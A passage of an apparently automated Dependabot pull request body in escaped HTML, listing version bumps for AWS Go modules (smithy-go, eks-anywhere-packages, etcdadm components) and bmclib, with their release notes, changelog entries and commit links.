href=\"https://github.com/aws/aws-sdk-go-v2/commit/c62ec38df6cc8e66ecf014365d8bd15c2599bc6d\"\u003e\u003ccode\u003ec62ec38\u003c/code\u003e\u003c/a\u003e create kitchen sink test service (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3023\"\u003e#3023\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.57.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.25.0\u003c/h2\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.4\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-06-16)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.4\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fix CBOR serd empty check for string and enum fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.3\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-02-17)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.3\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum Go version to 1.22 per our language support policy.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/73bb8a7d6e222332d46eec7209ba3cd0ba520239\"\u003e\u003ccode\u003e73bb8a7\u003c/code\u003e\u003c/a\u003e Release 2026-04-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f056c6fb0b43ba9bfeca6c29c8c1e1046437e45e\"\u003e\u003ccode\u003ef056c6f\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/ee36afc3d70050ba990c8de8d65043ac11d1f9f4\"\u003e\u003ccode\u003eee36afc\u003c/code\u003e\u003c/a\u003e Implement BDD generator for \u003ca href=\"https://github.com/endpointBdd\"\u003e\u003ccode\u003e@​endpointBdd\u003c/code\u003e\u003c/a\u003e Smithy trait (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/647\"\u003e#647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3dbea7015f5ed79312e2a3cb6bbf39f7a26e46ea\"\u003e\u003ccode\u003e3dbea70\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca 